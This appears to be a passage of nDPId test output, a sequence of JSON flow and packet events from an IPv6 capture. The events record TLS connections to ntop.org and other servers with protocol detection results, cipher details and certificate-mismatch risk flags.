-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXIAAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU0AAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSbiqmXmyY1W1zoBJvkBOIAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="} -00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269143410,"flow_last_seen":1448269143410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269143410,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1448269143410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143410,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAyiAEBA\/IPrOsAwAACXenXQBu97bCAR6JAzggBADIfF3AAABAQgKEg174HFvpAM="} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143539,"pkt":"eKzApw1M9LUv\/K\/Cht1gwAAAACAGKyoDKIAQED8g+s6wDAAAJd4qAA1AAAEAA3qswP\/+pw1MAbuddHokDODe2wgFgBAAa0\/sAAABAQgKcXBUrRINT9U="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144306,"flow_last_seen":1448269144306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269144306,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1448269144306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144306,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAACagSYBu7SkSa3RTHVvgBABRwoCAAABAQgKEg18wD9sNbI="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144348,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGNSoAFFBACwwCAAAAAAAAAJoqAA1AAAEAA3qswP\/+pw1MAbuBJtFMdW+0pEmugBABd0eeAAABAQgKP2zlshINJLA="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144450,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269144450,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="} -00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 